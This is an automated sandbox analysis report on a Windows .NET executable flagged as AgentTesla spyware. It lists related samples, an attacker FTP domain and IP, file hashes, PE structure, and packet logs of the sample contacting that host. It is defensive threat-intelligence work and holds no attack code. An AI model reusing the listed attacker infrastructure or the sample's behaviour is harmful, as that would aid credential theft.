                  Overall analysis duration:0h 8m 29s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:9
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:hesaphareketi__20241001.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@7/6@1/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 186
                  • Number of non-executed functions: 38
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtCreateKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  03:11:14API Interceptor10879078x Sleep call for process: hesaphareketi__20241001.exe modified
                  03:11:16API Interceptor19x Sleep call for process: powershell.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  104.247.165.99EUR Swift Bildirimi12-08-2024.exeGet hashmaliciousAgentTeslaBrowse
                    LisectAVT_2403002A_134.exeGet hashmaliciousAgentTeslaBrowse
                      hesaphareketi_____.exeGet hashmaliciousAgentTeslaBrowse
                        hesaphareketi__.exeGet hashmaliciousAgentTeslaBrowse
                          hesaphareketi-.exeGet hashmaliciousAgentTeslaBrowse
                            hesaphareketi-.exeGet hashmaliciousAgentTeslaBrowse
                              hesaphareketi-01-pdf.exeGet hashmaliciousAgentTeslaBrowse
                                19-03-2024_Takas_Sonuclari.exeGet hashmaliciousAgentTeslaBrowse
                                  CN-Invoice-0945413571-XXXXX6856-2312053735707600000.exeGet hashmaliciousAgentTeslaBrowse
                                    hesaphareketi-14-06-2024.exeGet hashmaliciousAgentTeslaBrowse

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      ftp.normagroup.com.trEUR Swift Bildirimi12-08-2024.exeGet hashmaliciousAgentTeslaBrowse
                                      • 104.247.165.99
                                      LisectAVT_2403002A_134.exeGet hashmaliciousAgentTeslaBrowse
                                      • 104.247.165.99
                                      hesaphareketi_____.exeGet hashmaliciousAgentTeslaBrowse
                                      • 104.247.165.99
                                      hesaphareketi__.exeGet hashmaliciousAgentTeslaBrowse
                                      • 104.247.165.99
                                      hesaphareketi-.exeGet hashmaliciousAgentTeslaBrowse
                                      • 104.247.165.99
                                      hesaphareketi-.exeGet hashmaliciousAgentTeslaBrowse
                                      • 104.247.165.99
                                      hesaphareketi-01-pdf.exeGet hashmaliciousAgentTeslaBrowse
                                      • 104.247.165.99
                                      19-03-2024_Takas_Sonuclari.exeGet hashmaliciousAgentTeslaBrowse
                                      • 104.247.165.99
                                      CN-Invoice-0945413571-XXXXX6856-2312053735707600000.exeGet hashmaliciousAgentTeslaBrowse
                                      • 104.247.165.99
                                      hesaphareketi-14-06-2024.exeGet hashmaliciousAgentTeslaBrowse
                                      • 104.247.165.99

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      ASN-QUADRANET-GLOBALUSnovo.ppc440fp.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 185.121.176.226
                                      Quote List.scr.exeGet hashmaliciousXenoRATBrowse
                                      • 66.63.168.142
                                      58ADE05412907F657812BDA267C43288EA79418091.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 66.63.187.123
                                      New Order.docGet hashmaliciousSnake KeyloggerBrowse
                                      • 66.63.187.123
                                      http://telegram.beethovenstore.com/Get hashmaliciousUnknownBrowse
                                      • 104.247.162.201
                                      https://83153.cc/Get hashmaliciousUnknownBrowse
                                      • 27.0.235.36
                                      0225139776.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      • 66.63.187.123
                                      http://bet938r.com/Get hashmaliciousUnknownBrowse
                                      • 27.0.235.160
                                      https://bet958v.com/Get hashmaliciousUnknownBrowse
                                      • 27.0.235.160
                                      Faktura 5643734_10.docGet hashmaliciousUnknownBrowse
                                      • 66.63.187.123

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hesaphareketi__20241001.exe.log

                                      Download File
                                      Process:C:\Users\user\Desktop\hesaphareketi__20241001.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1216
                                      Entropy (8bit):5.34331486778365
                                      Encrypted:false
                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                      Malicious:true
                                      Reputation:high, very likely benign file
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):2232
                                      Entropy (8bit):5.380805901110357
                                      Encrypted:false
                                      SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//MPUyus:lGLHyIFKL3IZ2KRH9Ougss
                                      MD5:C961E3496AA47D8AF3F9E184D4F78133
                                      SHA1:0EFEA67BD361E99BBE642D6EF414EBE7BB6EC134
                                      SHA-256:303E0E36CAC4900807E47B6AF8CDAB4FBFDB6A67D66F84F49E283557EA1774B1
                                      SHA-512:C3ECDCCF25D96C4F0C7B6407C8BAA7A0496C656C63E4757982FA1A754AF5B7902F3318F0AFE1363F365714584869A5E1E754692A84D814DD9EFDEB909A3104A3
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3hty4xym.goh.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bd1xluqj.ocf.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_krvza5le.p5j.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_svqnh3ct.fgw.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):7.720512829688984
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Windows Screen Saver (13104/52) 0.07%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      File name:hesaphareketi__20241001.exe
                                      File size:716'800 bytes
                                      MD5:5eaafeca7053687b46ecffad93c82418
                                      SHA1:457566502545fecd8ea9f2249b755135cd03b69b
                                      SHA256:27ff307b514230b2363e2284e1d57df50bc8a59b5cf8c732dc32d5587d472c64
                                      SHA512:2f05d5e83132e75aa92b629c5ea8147be87ab7818a08d847ffbd4d688f86fcf68b50ebbe9796952140f3fcb0b31f1726b51e4a6cb1aada2b2d59da1cd74482e1
                                      SSDEEP:12288:jeKw3uC2FoKHj3920VH89VuXdJlAVPQTiOR76+yt8j6KGtm2fv6msi:xw/cVHbQ0V1VcPQebbG6IwCK
                                      TLSH:E4E4D0D03F26731ACE699934C529DEB482B51D69B010BAF36DDD3B87799C102AE0CF46
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>.................0.............:.... ... ....@.. .......................`............@................................

                                      File Icon

                                      Icon Hash:00928e8e8686b000

                                      Static PE Info

                                      General

                                      Entrypoint:0x4b033a
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0xF298BC3E [Mon Dec 22 14:12:14 2098 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                      Entrypoint Preview

                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xb02e80x4f.text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xb20000x60c.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xb40000xc.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xaefd00x70.text
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x20000xae3400xae400684f8c108ea454d1c052f1eaa5981ec4False0.8929578214670014data7.728445191379543IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rsrc0xb20000x60c0x80032a5ed829a27fada75f4fd5da9e19b0bFalse0.333984375data3.419601708085662IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0xb40000xc0x200edacc63285b9f6a3e9f27589a6069f7fFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_VERSION0xb20900x37cdata0.4248878923766816
                                      RT_MANIFEST0xb241c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                      Imports

                                      DLLImport
                                      mscoree.dll_CorExeMain

                                      Network Behavior

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 3, 2024 09:12:54.922029018 CEST4974321192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:12:54.926958084 CEST2149743104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:12:54.929805040 CEST4974321192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:12:54.933651924 CEST4974321192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:12:54.938519001 CEST2149743104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:12:54.941732883 CEST4974321192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:12:57.955518961 CEST4974421192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:12:57.960575104 CEST2149744104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:12:57.960715055 CEST4974421192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:12:57.960907936 CEST4974421192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:12:57.966171026 CEST2149744104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:12:57.966916084 CEST4974421192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:02.408433914 CEST4974521192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:02.413570881 CEST2149745104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:02.413784027 CEST4974521192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:02.413923979 CEST4974521192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:02.418914080 CEST2149745104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:02.419253111 CEST4974521192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:06.379566908 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:06.384381056 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:06.387811899 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:07.003036976 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:07.006419897 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:07.012532949 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:07.225270033 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:07.225553989 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:07.234718084 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:07.470572948 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:07.470710039 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:07.475572109 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:07.689306974 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:07.689443111 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:07.695348024 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:07.906965971 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:07.907135963 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:07.912097931 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.124313116 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.124536991 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:08.129374981 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.341923952 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.346863031 CEST4974759911192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:08.351632118 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.352312088 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:08.353430033 CEST4974759911192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:08.357352972 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.962277889 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.966155052 CEST4974759911192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:08.971813917 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.971831083 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.971841097 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.971852064 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.971863985 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.971873045 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.971882105 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.972042084 CEST4974759911192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:08.972302914 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.972323895 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.972333908 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.972440004 CEST4974759911192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:08.977015972 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.977046967 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.977060080 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.977108955 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.977118969 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.977128029 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.977180958 CEST4974759911192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:08.977216005 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.977226973 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.977226973 CEST4974759911192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:08.977263927 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.977286100 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.977320910 CEST4974759911192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:08.977382898 CEST4974759911192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:08.977421045 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.977432966 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.977456093 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.977494955 CEST4974759911192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:08.982786894 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.982851982 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.982871056 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.982891083 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.982901096 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.983433962 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.983454943 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.983504057 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.983544111 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.983555079 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.983566999 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.983586073 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.983596087 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.983623028 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.983633041 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.983642101 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.984018087 CEST5991149747104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:08.985765934 CEST4974759911192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:09.012291908 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:09.442370892 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:09.496540070 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:20.583569050 CEST4974621192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:20.588339090 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:20.801656008 CEST2149746104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:20.802119017 CEST4975050773192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:20.806873083 CEST5077349750104.247.165.99192.168.2.5
                                      Oct 3, 2024 09:13:20.807672024 CEST4975050773192.168.2.5104.247.165.99
                                      Oct 3, 2024 09:13:20.807755947 CEST4974621192.168.2.5104.247.165.99
